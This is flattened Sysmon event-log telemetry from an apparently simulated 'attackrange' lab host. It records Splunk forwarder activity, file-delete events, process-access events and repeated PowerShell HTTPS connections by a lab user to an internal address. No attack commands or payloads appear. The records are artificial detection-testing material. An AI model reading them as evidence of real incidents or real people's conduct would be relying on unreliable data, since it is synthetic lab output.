354300x800000000000000036497576Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:34.689{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50549-false10.0.1.12-8000- 23542300x800000000000000036497575Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:04.587{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=602203DD24AECDAC50CE80F88653A6C8,SHA256=FAECE409B676C9B3FBA31F3BCD443C66E4B978029DB8D13E6B06A64FCDF3ABCB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497578Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:35.220{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50550-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497577Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:05.018{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A375B9B06C40DB4C3C0AC743BDDB916E,SHA256=DCE444CB60FFFE28B3F252BEFEA54E3A20BFE6731FF091764778B20871D07516,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497579Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:06.033{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=482CAB45AA4C05381365A0D384E735D4,SHA256=2CCA0108FE1BBBC40FEA754C4449029ECF0C8C87AED85D0AABF47BE416495C2E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497588Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:07.952{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A10F-6140-8656-04000000C801}6020C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497587Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:07.950{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497586Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:07.950{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497585Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:07.949{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497584Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:07.949{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497583Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:07.949{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-A10F-6140-8656-04000000C801}6020C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036497582Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:07.949{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A10F-6140-8656-04000000C801}6020C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036497581Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:07.931{B81B27B7-A10F-6140-8656-04000000C801}6020C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036497580Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:07.049{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D306992F2CBF8105819B13D39188379,SHA256=987B01AA022AE83E093D17D5782E360696DCCE8E0143DD5AFE425E1A2C877CE1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497601Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:08.949{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4D3B078DFCDC82DE2A251C97B3839848,SHA256=B80EA171D49CA32CB055625F536F4328EC739E8C6D6FA388D63A7B10F08056F2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497600Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:08.949{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5125F22B60F52F78558C89878D70D9AA,SHA256=198932531542B30E18EB16FABBA36FD661D01F9D316E0CC5FA1341695F806497,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497599Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:08.650{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A110-6140-8756-04000000C801}3684C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036497598Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:08.650{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=25DD19ECC4D0BBC7B1AF680C697E5F60,SHA256=41C8E3267D776BE15033CFF0E65DA3BA17BBA429B8C43865585932175128FB05,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497597Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:08.648{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497596Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:08.648{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497595Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:08.648{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497594Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:08.648{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497593Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:08.647{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-A110-6140-8756-04000000C801}3684C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036497592Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:08.647{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A110-6140-8756-04000000C801}3684C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036497591Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:08.631{B81B27B7-A110-6140-8756-04000000C801}3684C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036497590Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:08.130{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F8511FD8FA44DE8038A145F652C6710,SHA256=A43E82E2B1A9CBEE45B22A90B0659382239E97C6811CCC1DBD7B0B581BAF71D6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497589Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:08.099{B81B27B7-A10F-6140-8656-04000000C801}60205548C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000036497603Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:39.231{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50551-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497602Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:09.184{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66C040ABC74DD2AE69D4B49BD2377353,SHA256=44BFEDFAC2373B7A72F5B8EF051035917504B82FCE2369911A92CC5A068F11F2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497605Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:39.933{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50552-false10.0.1.12-8000- 23542300x800000000000000036497604Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:10.214{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A3330B6D5C853ED4D156D7C5396F7FC,SHA256=D14FE0467A2B3B0BBCFD11F1A7F84AD15E7658F1C3C448B1A9F195BEE86AF150,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497606Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:11.229{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23623300353BDA553D1E8966BB0DCC2B,SHA256=F7754DB9B2836B1F6D3101B123321CC7F0C39B32ADC09B90FABC0905DB36FD14,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497607Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:12.247{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=58190C1B1CB8A128835A373CE3024E30,SHA256=DE0660ED3CF1A4B1C5C4A441EB3291E35BBCAD2912AB72A1B49FBF51FDB9F0C4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497608Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:13.265{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B00AB4F3E43178348E1684ED579C54F4,SHA256=762B11D071E156E594495ED320D39A7C4A5D5699B0479AA6CDF99D27DFAFC004,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497611Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:45.251{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50553-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497610Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:14.667{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=43DCE127042F69273ED968C88F84203A,SHA256=4A8AB32C90EE33142DA81C4CCE3637DAF5031261FAD371179709E2F057CFF147,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497609Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:14.282{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=312BC303071A56699536DA5100A8A134,SHA256=DCA2A173F23C24AD196527DBCA65BA643BD069B3DA189B2BC9060324B90B8915,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497613Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:45.714{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50554-false10.0.1.12-8000- 23542300x800000000000000036497612Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:15.346{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 